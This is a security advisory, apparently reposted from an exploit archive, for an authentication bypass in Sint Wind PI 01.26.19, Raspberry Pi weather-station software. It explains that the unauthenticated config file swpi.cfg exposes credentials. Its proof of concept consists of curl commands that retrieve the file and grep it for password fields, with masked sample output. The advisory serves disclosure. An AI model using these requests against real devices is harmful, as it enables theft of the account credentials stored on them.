Sint Wind PI 01.26.19 Authentication Bypass

Sint Wind PI version 01.26.19 suffers from an authentication bypass vulnerability.


MD5 | 174e4d33a42654a568b034c9ff1fb36a


Sint Wind PI v01.26.19 Authentication Bypass


Vendor: Tonino Tarsi
Product web page: https://github.com/ToninoTarsi/swpi
Affected version: 01.26.19

Summary: A Meteo Station software for Raspberry PI. Capability include
telephone answering, webcams, digital cameras, web. A Sint Wind is a
wind condition (and other meteo data) telephone answering machine. This
implementation uses a Raspberry PI with an Huawei 3G dongle. The Sint
Wind is compatible with different kind of Meteo Sensors (WH1080, WH3080,
Davis, TX32, BMP085...).

Desc: Insecure Direct Object Reference flaw allows retrieval of configuration
file which contains authentication credentials to device and other nodes
associated with it. The web application does not check for an authenticated
session to access its resources allowing direct access to swpi.cfg (config file)
which contains credentials.

Tested on: SimpleHTTP/0.6 Python/2.7.3
Raspberry PI


Vulnerability discovered by Humberto Cabrera
@zeroscience


Advisory ID: ZSL-2018-5472
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5472.php


28.05.2018

--


PoC:

--
curl http://target/swpi.cfg | grep -i pwd

smspwd = [*]
gmail_pwd = [*]
dnsexit_pwd = [*]

--
curl http://target/swpi.cfg | grep -i pass

ftpserverpassowd = [*]
weatherunderground_password = [*]
pws_password = XXXXXXXX
cwop_password = -1
windfinder_password = ******


Related Posts